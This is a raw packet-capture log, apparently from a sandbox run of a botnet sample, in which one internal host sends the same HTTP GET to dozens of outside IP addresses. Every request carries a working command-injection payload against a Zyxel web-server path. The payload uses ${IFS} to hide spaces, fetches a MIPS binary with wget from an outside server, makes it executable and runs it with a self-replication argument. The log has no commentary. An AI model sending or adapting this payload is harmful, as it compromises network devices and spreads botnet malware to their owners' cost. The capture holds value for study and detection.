                                        Jan 14, 2024 16:18:31.155118942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        904192.168.2.13404548.199.98.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155158997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        905192.168.2.1353812164.139.76.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155184031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        906192.168.2.1359918108.130.226.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155226946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        907192.168.2.1358906205.16.170.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155265093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        908192.168.2.1339106134.37.12.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155303955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        909192.168.2.135810034.88.200.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155338049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        910192.168.2.135392492.109.77.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155364990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        911192.168.2.136066642.241.35.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155421972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        912192.168.2.134141478.147.217.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155462027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        913192.168.2.1343644180.31.140.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155497074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        914192.168.2.135780424.148.198.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155540943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        915192.168.2.1343950202.0.254.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155572891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        916192.168.2.134279872.230.177.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155616045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        917192.168.2.1341632114.133.88.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.155648947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        918192.168.2.135413688.147.244.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159250975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        919192.168.2.1346808144.117.221.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159291029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        920192.168.2.135933639.11.211.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159338951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        921192.168.2.1358858140.210.106.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159389019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        922192.168.2.1348022212.135.13.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159420013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        923192.168.2.1359298110.168.47.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159449100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        924192.168.2.133540044.10.161.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159482956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        925192.168.2.13587724.73.219.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159529924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        926192.168.2.134869659.214.248.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.159569025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        927192.168.2.1355992118.197.72.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154033899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        928192.168.2.135325438.59.198.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154103994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        929192.168.2.134024657.192.188.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154210091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        930192.168.2.1340838132.68.77.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154300928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        931192.168.2.135594652.206.129.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154341936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        932192.168.2.135828031.77.31.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154402971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        933192.168.2.1353092216.239.75.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154476881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        934192.168.2.1340590160.153.28.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154495001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        935192.168.2.1340670177.208.171.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154536009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        936192.168.2.13507301.15.50.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154586077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        937192.168.2.1337472142.27.11.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154611111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        938192.168.2.1357216115.196.88.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154678106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        939192.168.2.134712839.62.168.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154736996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        940192.168.2.1349562164.129.46.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154865980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        941192.168.2.1335714165.219.159.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154866934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        942192.168.2.1343292195.157.46.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154895067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        943192.168.2.1336588222.175.131.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.154932022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        944192.168.2.1355958197.50.18.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155044079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        945192.168.2.1346128106.191.27.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155066013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        946192.168.2.1340562145.105.98.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155128956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        947192.168.2.1334536210.146.213.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155186892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        948192.168.2.1345936150.43.192.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155261993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        949192.168.2.133977039.89.228.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155337095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        950192.168.2.1355276195.209.172.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155375957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        951192.168.2.135614043.129.62.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155481100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        952192.168.2.1334368222.167.241.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155504942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        953192.168.2.1347270190.95.35.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155551910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        954192.168.2.135397887.52.70.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155637980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        955192.168.2.1359324128.156.122.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155670881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        956192.168.2.133647287.171.91.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155725956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        957192.168.2.1332818172.8.39.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155772924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        958192.168.2.1351988122.187.2.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155843019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        959192.168.2.134492877.57.85.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155896902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        960192.168.2.1345436196.182.169.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.155956030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        961192.168.2.135430854.224.125.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156023026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        962192.168.2.13379305.10.174.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156121016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        963192.168.2.135300631.21.28.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156121016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        964192.168.2.135587870.102.171.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156151056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        965192.168.2.1344710118.166.68.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156204939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        966192.168.2.133469084.62.113.11443
                                        TimestampBytes transferredDirectionData
